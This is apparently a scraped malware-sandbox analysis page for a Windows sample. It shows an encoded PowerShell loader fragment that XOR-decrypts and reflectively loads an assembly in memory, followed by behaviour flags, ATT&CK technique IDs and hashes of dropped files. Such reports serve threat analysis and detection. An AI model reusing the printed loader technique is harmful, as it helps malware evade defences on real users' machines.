NAAoAJABNAGwATwBwAG4AZABxAD0AWwBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AFAAdAByAFQAbwBTAHQAcgBpAG4AZwBCAFMAVABSACgAWwBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnAFQAbwBCAFMAVABSACgAJABaAGoAbABrAHAAZQBWACkAKQA7AA0ACgBmAG8AcgAoACQASgBWAHQAaAB5AHIAPQAwADsAJABKAFYAdABoAHkAcgAgAC0AbAB0ACAAJABIAHEAbQB3AHMAcgB1AC4AQwBvAHUAbgB0ADsAJABKAFYAdABoAHkAcgArACsAKQAgAHsAJABIAHEAbQB3AHMAcgB1AFsAJABKAFYAdABoAHkAcgBdACAAPQAgACQASABxAG0AdwBzAHIAdQBbACQASgBWAHQAaAB5AHIAXQAgAC0AYgB4AG8AcgAgACQATQBsAE8AcABuAGQAcQBbACQASgBWAHQAaAB5AHIAIAAlACAAJABNAGwATwBwAG4AZABxAC4ATABlAG4AZwB0AGgAXQB9ADsADQAKACQAVQB1AHYAcAB3AGMAdwB6AGgAagB6AGwAbwB5AGIAPQBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQASABxAG0AdwBzAHIAdQApADsADQAKACQATABiAGEAZgB0AG0AZgBoAHoASgBtAHAAegB6AGQAYwBsAGIAZQBlAGkAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwAuAEwAaQBzAHQAWwBTAHkAcwB0AGUAbQAuAFMAdAByAGkAbgBnAFsAXQBdAF0AOgA6AG4AZQB3ACgAKQA7AA0ACgAkAEwAYgBhAGYAdABtAGYAaAB6AEoAbQBwAHoAegBkAGMAbABiAGUAZQBpAC4AQQBkAGQAKAAiADYANwBFADIANgAxADMAMAAzADQAQQBCAEMAMABCAEYANQA3ADQANgBBAEYANgBEADcANwAzADYARQA1AEEAQQAiACkAOwANAAoAJABVAHUAdgBwAHcAYwB3AHoAaABqAHoAbABvAHkAYgAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQARwBsAGIARAB3AHAAYQB4AGsAbgB0AGoALAAgACQATABiAGEAZgB0AG0AZgBoAHoASgBtAHAAegB6AGQAYwBsAGIAZQBlAGkAKQA7AA0ACgAJAA==
2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3952

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

1

T1130

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cce973b40f864284f2226213f1989c45861d89fd62eb0e311e880f5d017e23b2.exe.log
Filesize
425B

MD5
fff5cbccb6b31b40f834b8f4778a779a

SHA1
899ed0377e89f1ed434cfeecc5bc0163ebdf0454

SHA256
b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76

SHA512
1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bkmdqqkch.exe
Filesize
997KB

MD5
dbc534854dd385e59a3f1906ddfb9020

SHA1
2b3062d82232ce10a8713829199769ff0d12e0fc

SHA256
06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0

SHA512
1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bkmdqqkch.exe
Filesize
997KB

MD5
dbc534854dd385e59a3f1906ddfb9020

SHA1
2b3062d82232ce10a8713829199769ff0d12e0fc

SHA256
06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0

SHA512
1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951

Download Submit
memory/3316-130-0x0000019E5BAB0000-0x0000019E5BC2A000-memory.dmp

Filesize
1.5MB

Download
memory/3316-131-0x00007FFEFC6D0000-0x00007FFEFD191000-memory.dmp

Filesize
10.8MB

Download
memory/3952-140-0x0000000000000000-mapping.dmp

Download
memory/3952-141-0x00007FFEFC780000-0x00007FFEFD241000-memory.dmp

Filesize
10.8MB

Download
memory/4796-132-0x0000000000000000-mapping.dmp

Download
memory/5088-134-0x0000000000000000-mapping.dmp

Download
memory/5088-136-0x00007FFEFC6D0000-0x00007FFEFD191000-memory.dmp

Filesize
10.8MB

Download
memory/5088-137-0x0000018DB4DF0000-0x0000018DB4E12000-memory.dmp

Filesize
136KB

Download
memory/5088-138-0x0000018DCFC60000-0x0000018DCFCB0000-memory.dmp

Filesize
320KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads